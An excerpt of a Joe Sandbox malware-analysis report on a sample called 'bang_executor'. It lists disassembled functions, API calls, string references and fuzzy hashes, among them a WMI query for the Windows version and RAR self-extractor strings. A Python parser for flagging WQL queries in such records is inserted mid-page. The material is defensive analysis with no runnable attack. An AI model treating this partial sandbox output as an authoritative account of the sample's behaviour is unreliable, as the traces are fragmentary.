                                        • _free.LIBCMT ref: 0050B8C5
                                          • Part of subcall function 0050BAFA: RtlFreeHeap.NTDLL(00000000,00000000,?,0050EEE6,?,00000000,?,00000000,?,0050EF0D,?,00000007,?,?,0050F30A,?), ref: 0050BB10
                                          • Part of subcall function 0050BAFA: GetLastError.KERNEL32(?,?,0050EEE6,?,00000000,?,00000000,?,0050EF0D,?,00000007,?,?,0050F30A,?,?), ref: 0050BB22
                                        • _free.LIBCMT ref: 0050B8D1
                                        • _free.LIBCMT ref: 0050B8DC
                                        • _free.LIBCMT ref: 0050B8E7
                                        • _free.LIBCMT ref: 0050B8F2
                                        • _free.LIBCMT ref: 0050B8FD
                                        • _free.LIBCMT ref: 0050B908
                                        • _free.LIBCMT ref: 0050B913
                                        • _free.LIBCMT ref: 0050B91E
                                        • _free.LIBCMT ref: 0050B92C
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1633431489.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                         • Associated: 00000000.00000002.1633388033.00000000004E0000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1633487430.0000000000516000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1633512119.0000000000522000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1633512119.0000000000529000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1633512119.0000000000546000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1633645504.0000000000547000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1633645504.0000000000555000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1633645504.000000000058C000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_bang_executor.jbxd
                                        Similarity
                                        • API ID: _free$ErrorFreeHeapLast
                                        • String ID:
                                        • API String ID: 776569668-0
                                        • Opcode ID: 6d1f4c6da6f7daf6bb2a9bcfae28c8b6879a904fa865fa70e1264dee87241670
                                        • Instruction ID: 1797ed1000306d7523376c049cf2a4c1adf700b197b89acb115f9bb17ffcd6e5
                                        • Opcode Fuzzy Hash: 6d1f4c6da6f7daf6bb2a9bcfae28c8b6879a904fa865fa70e1264dee87241670
                                        • Instruction Fuzzy Hash: F411A77A20014AAFDB01EF99C9D6CDD3FB5FF44350B0180A5FA094B1A2DB71EA51DB90
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1633431489.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                         • Associated: 00000000.00000002.1633388033.00000000004E0000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1633487430.0000000000516000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1633512119.0000000000522000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1633512119.0000000000529000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1633512119.0000000000546000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1633645504.0000000000547000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1633645504.0000000000555000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1633645504.000000000058C000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_bang_executor.jbxd
                                        Similarity
                                        • API ID: CallFramesMatchNestedTypeUnexpectedUnwind_aborttype_info::operator==
                                        • String ID: csm$csm$csm
                                        • API String ID: 322700389-393685449
                                        • Opcode ID: 35ff27130ee7caf4b16e03d0d29b7ef74c758fff299a2bb170ac369a22a70171
                                        • Instruction ID: 607d610f562bc660588860e9bb6a1f80f818d4298ac7e23567b7cff740bac2ff
                                        • Opcode Fuzzy Hash: 35ff27130ee7caf4b16e03d0d29b7ef74c758fff299a2bb170ac369a22a70171
                                        • Instruction Fuzzy Hash: F2B17771800A0AEFCF25DFA4C9859AFBFB5FF44310B14455AE8016B282E771EA51DFA1
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1633431489.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                         • Associated: 00000000.00000002.1633388033.00000000004E0000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1633487430.0000000000516000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1633512119.0000000000522000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1633512119.0000000000529000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1633512119.0000000000546000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1633645504.0000000000547000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1633645504.0000000000555000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1633645504.000000000058C000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_bang_executor.jbxd
                                        Similarity
                                        • API ID: ClearH_prolog3Variant
                                        • String ID: Name$ROOT\CIMV2$SELECT * FROM Win32_OperatingSystem$WQL$Windows 10$fP
                                        • API String ID: 3629354427-3941458401
                                        • Opcode ID: 891fd1b4065166d79deb3fd935e4b8c63523e2c7d9e3aa45efd2e07d2424351b
                                        • Instruction ID: be92dfabea28958c5733b1e28e30b3627dfcb04703636f4a9e319bfd767cdc49
                                        • Opcode Fuzzy Hash: 891fd1b4065166d79deb3fd935e4b8c63523e2c7d9e3aa45efd2e07d2424351b
                                        • Instruction Fuzzy Hash: B8716B74A002599FDB14DFA5CC94DBFBBB9FF48711B04416EE516A72A0CB38AD02CB54
                                        Uniqueness

                                        Uniqueness Score: -1.00%
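                                         The record above is the one worth pausing on in this run of records: its String ID carries ROOT\CIMV2, the WQL query SELECT * FROM Win32_OperatingSystem, the property Name and the literal Windows 10, i.e. the sample reads the OS name through WMI and compares it against a fixed version string. In a report of this length such records are easier to find mechanically than by scrolling. The Python below is an added example for this page, not Joe Sandbox or IDA plugin code: it parses function records in the layout shown here (an APIs header, bullet API calls with a ref: address, and the Similarity bullets), splits the $-joined String ID list, and reports every record whose strings contain a WQL query. The sample input is constructed from two records on this page, trimmed to the lines the parser needs; the regular expressions assume the exact bullet and key layout seen here and nothing more.

```python
import re
from dataclasses import dataclass, field

# Constructed sample input: two records in the layout of this report, trimmed to the
# lines the parser uses (the Associated dump lines are omitted). The subcall line in
# the second record is borrowed from another record on the page.
SAMPLE = r"""
APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.1633431489.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_4e0000_bang_executor.jbxd
Similarity
• API ID: ClearH_prolog3Variant
• String ID: Name$ROOT\CIMV2$SELECT * FROM Win32_OperatingSystem$WQL$Windows 10$fP
• API String ID: 3629354427-3941458401
• Instruction Fuzzy Hash: B8716B74A002599FDB14DFA5CC94DBFBBB9FF48711B04416EE516A72A0CB38AD02CB54
Uniqueness

Uniqueness Score: -1.00%

APIs
• FileTimeToSystemTime.KERNEL32(?,?), ref: 004FCBEE
• SystemTimeToTzSpecificLocalTime.KERNEL32(00000000,?,?), ref: 004FCC05
  • Part of subcall function 004ED076: GetVersionExW.KERNEL32(?), ref: 004ED0A7
• _swprintf.LIBCMT ref: 004FCC85
Strings
Memory Dump Source
• Source File: 00000000.00000002.1633431489.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_4e0000_bang_executor.jbxd
Similarity
• API ID: Time$System$File$Format$DateLocalSpecific_swprintf
• String ID: %s %s
• API String ID: 385609497-2939940506
• Instruction Fuzzy Hash: D8213BB254024CABDB20DFA1DD48EEF77BCEF59304F10456AFA09D7112E6349A09CB60
Uniqueness

Uniqueness Score: -1.00%
"""

# "• Name.MODULE(args), ref: ADDR" or "• Name.MODULE ref: ADDR", optionally prefixed
# with "Part of subcall function ADDR:" for calls the plugin attributes one level down.
API_CALL = re.compile(
    r"^•\s*(?:Part of subcall function [0-9A-F]+:\s*)?"
    r"(\w+?)\.([A-Z0-9_]+)(?=[(\s]).*?ref:\s*([0-9A-F]+)"
)
# "• Key: value" metadata bullets (API ID, String ID, fuzzy hashes, ...).
FIELD = re.compile(r"^•\s*([A-Za-z ]+?):\s*(.*)$")
# A WQL query as it appears inside the String ID list.
WQL = re.compile(r"^\s*SELECT\b.*\bFROM\b", re.IGNORECASE)


@dataclass
class FunctionRecord:
    api_calls: list = field(default_factory=list)  # (function, module, ref address)
    fields: dict = field(default_factory=dict)

    @property
    def strings(self):
        # The String ID bullet joins the function's string references with "$".
        return [s for s in self.fields.get("String ID", "").split("$") if s]

    def wql_queries(self):
        return [s for s in self.strings if WQL.match(s)]


def parse_records(text):
    """Split report text into FunctionRecord objects, one per 'APIs' block."""
    records, current = [], None
    for raw in text.splitlines():
        line = raw.strip()
        if line == "APIs":
            current = FunctionRecord()
            records.append(current)
            continue
        if current is None or not line.startswith("•"):
            continue
        m = API_CALL.match(line)
        if m:
            current.api_calls.append((m.group(1), m.group(2), m.group(3)))
            continue
        m = FIELD.match(line)
        if m:
            current.fields[m.group(1)] = m.group(2)
    return records


def triage(text):
    """Return (record index, API ID, WQL queries) for every record carrying a WQL query."""
    hits = []
    for i, rec in enumerate(parse_records(text)):
        queries = rec.wql_queries()
        if queries:
            hits.append((i, rec.fields.get("API ID", ""), queries))
    return hits


if __name__ == "__main__":
    for index, api_id, queries in triage(SAMPLE):
        print(f"record {index} ({api_id}): {queries}")
```

                                         Run against the full text of this page, triage() returns only the WMI record; the api_calls tuples keep the ref: addresses, so a hit can be taken straight to the function in the memory dump at Offset 004E0000.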

                                        APIs
                                        • GetConsoleCP.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,00512452,00000000,00000000,00000000,00000000,00000000,?), ref: 00511D1F
                                        • __fassign.LIBCMT ref: 00511D9A
                                        • __fassign.LIBCMT ref: 00511DB5
                                        • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,00000000,00000005,00000000,00000000), ref: 00511DDB
                                        • WriteFile.KERNEL32(?,00000000,00000000,R$Q,00000000,?,?,?,?,?,?,?,?,?,00512452,00000000), ref: 00511DFA
                                        • WriteFile.KERNEL32(?,00000000,00000001,R$Q,00000000,?,?,?,?,?,?,?,?,?,00512452,00000000), ref: 00511E33
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1633431489.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                         • Associated: 00000000.00000002.1633388033.00000000004E0000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1633487430.0000000000516000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1633512119.0000000000522000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1633512119.0000000000529000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1633512119.0000000000546000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1633645504.0000000000547000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1633645504.0000000000555000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1633645504.000000000058C000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_bang_executor.jbxd
                                        Similarity
                                        • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                        • String ID: R$Q
                                        • API String ID: 1324828854-2113774344
                                        • Opcode ID: 4bd5085a5f5d060adcf9056ea5bb6c5a733c0c23accd2b2d3669892ecd10dab7
                                        • Instruction ID: 8999552401c835edaa69c19c8683e34df2e9a20e97002f90646999795435355a
                                        • Opcode Fuzzy Hash: 4bd5085a5f5d060adcf9056ea5bb6c5a733c0c23accd2b2d3669892ecd10dab7
                                        • Instruction Fuzzy Hash: 9951E875900645AFEB10CFA8DC45AEEBFF8FF09300F14455AEA51E7291D7309944CBA4
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                          • Part of subcall function 004E1366: GetDlgItem.USER32(00000000,00003021), ref: 004E13AA
                                          • Part of subcall function 004E1366: SetWindowTextW.USER32(00000000,005165F4), ref: 004E13C0
                                        • EndDialog.USER32(?,00000001), ref: 004FD910
                                        • SendMessageW.USER32(?,00000080,00000001,?), ref: 004FD937
                                        • SendDlgItemMessageW.USER32(?,00000066,00000172,00000000,?), ref: 004FD950
                                        • SetWindowTextW.USER32(?,?), ref: 004FD961
                                        • GetDlgItem.USER32(?,00000065), ref: 004FD96A
                                        • SendMessageW.USER32(00000000,00000435,00000000,00010000), ref: 004FD97E
                                        • SendMessageW.USER32(00000000,00000443,00000000,00000000), ref: 004FD994
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1633431489.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                         • Associated: 00000000.00000002.1633388033.00000000004E0000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1633487430.0000000000516000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1633512119.0000000000522000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1633512119.0000000000529000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1633512119.0000000000546000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1633645504.0000000000547000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1633645504.0000000000555000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1633645504.000000000058C000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_bang_executor.jbxd
                                        Similarity
                                        • API ID: MessageSend$Item$TextWindow$Dialog
                                        • String ID: LICENSEDLG
                                        • API String ID: 3214253823-2177901306
                                        • Opcode ID: 11c0d1700fe6f27d00122b857c9846920f0ac1a1adb6856f9c5646923c884e89
                                        • Instruction ID: 812f3c1bb12563a4feebf804362f307c982a524fb55c864d396651c9fc79d03a
                                        • Opcode Fuzzy Hash: 11c0d1700fe6f27d00122b857c9846920f0ac1a1adb6856f9c5646923c884e89
                                        • Instruction Fuzzy Hash: F821267660420C7BD3115FA1EC4DFBB3B7DEB5BB49F00040AF300A21A0CBA69909E635
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • _wcslen.LIBCMT ref: 004EBFA3
                                          • Part of subcall function 004F34D7: GetSystemTime.KERNEL32(?,00000000), ref: 004F34EF
                                          • Part of subcall function 004F34D7: SystemTimeToFileTime.KERNEL32(?,?), ref: 004F34FD
                                          • Part of subcall function 004F3480: __aulldiv.LIBCMT ref: 004F3489
                                        • __aulldiv.LIBCMT ref: 004EBFCF
                                        • GetCurrentProcessId.KERNEL32(00000000,?,000186A0,00000000,?,?,?,?), ref: 004EBFD6
                                        • _swprintf.LIBCMT ref: 004EC001
                                          • Part of subcall function 004E4C00: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 004E4C13
                                        • _wcslen.LIBCMT ref: 004EC00B
                                        • _swprintf.LIBCMT ref: 004EC061
                                        • _wcslen.LIBCMT ref: 004EC06B
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1633431489.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                         • Associated: 00000000.00000002.1633388033.00000000004E0000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1633487430.0000000000516000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1633512119.0000000000522000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1633512119.0000000000529000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1633512119.0000000000546000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1633645504.0000000000547000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1633645504.0000000000555000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1633645504.000000000058C000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_bang_executor.jbxd
                                        Similarity
                                        • API ID: Time_wcslen$System__aulldiv_swprintf$CurrentFileProcess__vswprintf_c_l
                                        • String ID: %u.%03u
                                        • API String ID: 2956649372-1114938957
                                        • Opcode ID: 8df3a199756f1730afce0d06ab8357dc12b76fc314e8544b8c461de83d1f834b
                                        • Instruction ID: 63b5dfdecb94860bf49d4a85184484cabe6a6f0fb0644d49d4548ff463e16f14
                                        • Opcode Fuzzy Hash: 8df3a199756f1730afce0d06ab8357dc12b76fc314e8544b8c461de83d1f834b
                                        • Instruction Fuzzy Hash: A8218472A04341AFC624EF66CC85EAF7BECEBC4740F44491EF544D3241DA34DA088796
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • FileTimeToSystemTime.KERNEL32(?,?), ref: 004FCBEE
                                        • SystemTimeToTzSpecificLocalTime.KERNEL32(00000000,?,?), ref: 004FCC05
                                        • SystemTimeToFileTime.KERNEL32(?,?), ref: 004FCC19
                                        • FileTimeToSystemTime.KERNEL32(?,?), ref: 004FCC2A
                                        • GetDateFormatW.KERNEL32(00000400,00000000,?,00000000,?,00000032), ref: 004FCC42
                                        • GetTimeFormatW.KERNEL32(00000400,?,?,00000000,00000000,00000032), ref: 004FCC66
                                        • _swprintf.LIBCMT ref: 004FCC85
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1633431489.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                         • Associated: 00000000.00000002.1633388033.00000000004E0000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1633487430.0000000000516000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1633512119.0000000000522000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1633512119.0000000000529000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1633512119.0000000000546000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1633645504.0000000000547000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1633645504.0000000000555000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1633645504.000000000058C000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_bang_executor.jbxd
                                        Similarity
                                        • API ID: Time$System$File$Format$DateLocalSpecific_swprintf
                                        • String ID: %s %s
                                        • API String ID: 385609497-2939940506
                                        • Opcode ID: 48cf1bd3d3c042f87777d6f4a88cf4688b7a379cc735872c7420764041b8c533
                                        • Instruction ID: ab308eb086da3a370757a73e0340e14c99d6089888506bbede67dc37f397b52a
                                        • Opcode Fuzzy Hash: 48cf1bd3d3c042f87777d6f4a88cf4688b7a379cc735872c7420764041b8c533
                                        • Instruction Fuzzy Hash: D8213BB254024CABDB20DFA1DD48EEF77BCEF59304F10456AFA09D7112E6349A09CB60
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • MultiByteToWideChar.KERNEL32(00000000,00000000,004ECEA9,004ECEAB,00000000,00000000,08ADEBCE,00000001,00000000,00000000,?,004ECD87,?,00000004,004ECEA9,ROOT\CIMV2), ref: 005023E9
                                        • MultiByteToWideChar.KERNEL32(00000000,00000000,004ECEA9,?,00000000,00000000,?,?,004ECD87,?,00000004,004ECEA9), ref: 00502464
                                        • SysAllocString.OLEAUT32(00000000), ref: 0050246F
                                        • _com_issue_error.COMSUPP ref: 00502498
                                        • _com_issue_error.COMSUPP ref: 005024A2
                                        • GetLastError.KERNEL32(80070057,08ADEBCE,00000001,00000000,00000000,?,004ECD87,?,00000004,004ECEA9,ROOT\CIMV2), ref: 005024A7
                                        • _com_issue_error.COMSUPP ref: 005024BA
                                        • GetLastError.KERNEL32(00000000,?,004ECD87,?,00000004,004ECEA9,ROOT\CIMV2), ref: 005024D0
                                        • _com_issue_error.COMSUPP ref: 005024E3
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1633431489.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                         • Associated: 00000000.00000002.1633388033.00000000004E0000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1633487430.0000000000516000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1633512119.0000000000522000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1633512119.0000000000529000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1633512119.0000000000546000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1633645504.0000000000547000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1633645504.0000000000555000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1633645504.000000000058C000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_bang_executor.jbxd
                                        Similarity
                                        • API ID: _com_issue_error$ByteCharErrorLastMultiWide$AllocString
                                        • String ID:
                                        • API String ID: 1353541977-0
                                        • Opcode ID: 081232117605d7050c336ea9459b5fd47c3d9a3dfd36a9ee58381791910e8784
                                        • Instruction ID: 567d544c5939e321f7c7b02b579de79875de234a2eb36ad44f71632c5049bfca
                                        • Opcode Fuzzy Hash: 081232117605d7050c336ea9459b5fd47c3d9a3dfd36a9ee58381791910e8784
                                        • Instruction Fuzzy Hash: 1441D571A00205ABDB149F68DC4DBEEBFA8FB48710F208629F905E72D1D775A844CBA5
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1633431489.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                         • Associated: 00000000.00000002.1633388033.00000000004E0000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1633487430.0000000000516000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1633512119.0000000000522000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1633512119.0000000000529000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1633512119.0000000000546000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1633645504.0000000000547000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1633645504.0000000000555000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1633645504.000000000058C000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_bang_executor.jbxd
                                        Similarity
                                        • API ID: __alldvrm$_strrchr
                                        • String ID: =zP$=zP$=zP
                                        • API String ID: 1036877536-2151294112
                                        • Opcode ID: d14ae59a6c47695d102f38ce8bebab2561187863f3de3b9f7c7780fcd14afeb7
                                        • Instruction ID: 8bc7965a7c4c9d3038356fd57e4822087ca460464cbbbd95d878199625cc55a4
                                        • Opcode Fuzzy Hash: d14ae59a6c47695d102f38ce8bebab2561187863f3de3b9f7c7780fcd14afeb7
                                        • Instruction Fuzzy Hash: D6A126769003869FEB25CF68C8917AEBFE5FF53350F1847A9E8959B2C2C2348941C750
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • _ValidateLocalCookies.LIBCMT ref: 00504F57
                                        • ___except_validate_context_record.LIBVCRUNTIME ref: 00504F5F
                                        • _ValidateLocalCookies.LIBCMT ref: 00504FE8
                                        • __IsNonwritableInCurrentImage.LIBCMT ref: 00505013
                                        • _ValidateLocalCookies.LIBCMT ref: 00505068
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1633431489.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                         • Associated: 00000000.00000002.1633388033.00000000004E0000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1633487430.0000000000516000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1633512119.0000000000522000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1633512119.0000000000529000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1633512119.0000000000546000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1633645504.0000000000547000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1633645504.0000000000555000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1633645504.000000000058C000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_bang_executor.jbxd
                                        Similarity
                                        • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                        • String ID: MP$csm
                                        • API String ID: 1170836740-1622360913
                                        • Opcode ID: 11493c4bc1e6c7276dad87e5e205fb33bc907ce5605c2552c7765ecd68bbdae0
                                        • Instruction ID: cef50cc7ecc1728f35f6c8ae4bd5bbd10bea83b84d6c9c697d0e4063b29b1240
                                        • Opcode Fuzzy Hash: 11493c4bc1e6c7276dad87e5e205fb33bc907ce5605c2552c7765ecd68bbdae0
                                        • Instruction Fuzzy Hash: 1F411278A0021AAFCF10DF28C899A9EBFB4BF45314F148155E9149B3D2DB319A55CF90
                                        Uniqueness
                                        • Uniqueness Score: -1.00%
                                        APIs
                                        • __aulldiv.LIBCMT ref: 004F331D
                                          • Part of subcall function 004ED076: GetVersionExW.KERNEL32(?), ref: 004ED0A7
                                        • FileTimeToLocalFileTime.KERNEL32(000000FF,?,?,000000FF,00000064,00000000,?,00000000), ref: 004F3340
                                        • FileTimeToSystemTime.KERNEL32(000000FF,?,?,000000FF,00000064,00000000,?,00000000), ref: 004F3352
                                        • SystemTimeToTzSpecificLocalTime.KERNEL32(00000000,?,?), ref: 004F3363
                                        • SystemTimeToFileTime.KERNEL32(?,?), ref: 004F3373
                                        • SystemTimeToFileTime.KERNEL32(?,?), ref: 004F3383
                                        • FileTimeToSystemTime.KERNEL32(?,?,?), ref: 004F33BE
                                        • __aullrem.LIBCMT ref: 004F3464
                                        Similarity
                                        • API ID: Time$File$System$Local$SpecificVersion__aulldiv__aullrem
                                        • String ID:
                                        • API String ID: 1247370737-0
                                        Uniqueness
                                        • Uniqueness Score: -1.00%
                                        APIs
                                        Strings
                                        Similarity
                                        • API ID: _wcslen
                                        • String ID: </p>$</style>$<br>$<style>$>
                                        • API String ID: 176396367-3568243669
                                        Uniqueness
                                        • Uniqueness Score: -1.00%
                                        APIs
                                        • GetLongPathNameW.KERNEL32(?,?,00000800), ref: 004EAD2B
                                        • GetShortPathNameW.KERNEL32(?,?,00000800), ref: 004EAD4A
                                          • Part of subcall function 004EE208: _wcslen.LIBCMT ref: 004EE210
                                          • Part of subcall function 004F4168: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,000000FF,004EE084,00000000,.exe,?,?,00000800,?,?,?,004FAD5D), ref: 004F417E
                                        • _swprintf.LIBCMT ref: 004EADEC
                                          • Part of subcall function 004E4C00: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 004E4C13
                                        • MoveFileW.KERNEL32(?,?), ref: 004EAE5E
                                        • MoveFileW.KERNEL32(?,?), ref: 004EAE9E
                                        Strings
                                        Similarity
                                        • API ID: FileMoveNamePath$CompareLongShortString__vswprintf_c_l_swprintf_wcslen
                                        • String ID: rtmp%d
                                        • API String ID: 2133196417-3303766350
                                        Uniqueness
                                        • Uniqueness Score: -1.00%
                                        APIs
                                        • ShowWindow.USER32(?,00000000), ref: 004FBE8A
                                        • GetWindowRect.USER32(?,?), ref: 004FBED1
                                        • ShowWindow.USER32(?,00000005,00000000), ref: 004FBF6C
                                        • SetWindowTextW.USER32(?,00000000), ref: 004FBF74
                                        • ShowWindow.USER32(00000000,00000005), ref: 004FBF8A
                                        Strings
                                        Similarity
                                        • API ID: Window$Show$RectText
                                        • String ID: RarHtmlClassName
                                        • API String ID: 3937224194-1658105358
                                        Uniqueness
                                        • Uniqueness Score: -1.00%
                                        APIs
                                        Strings
                                        Similarity
                                        • API ID: _wcslen
                                        • String ID: $&nbsp;$<br>$<style>body{font-family:"Arial";font-size:12;}</style>
                                        • API String ID: 176396367-3743748572
                                        Uniqueness
                                        • Uniqueness Score: -1.00%
                                        APIs
                                          • Part of subcall function 0050EEB8: _free.LIBCMT ref: 0050EEE1
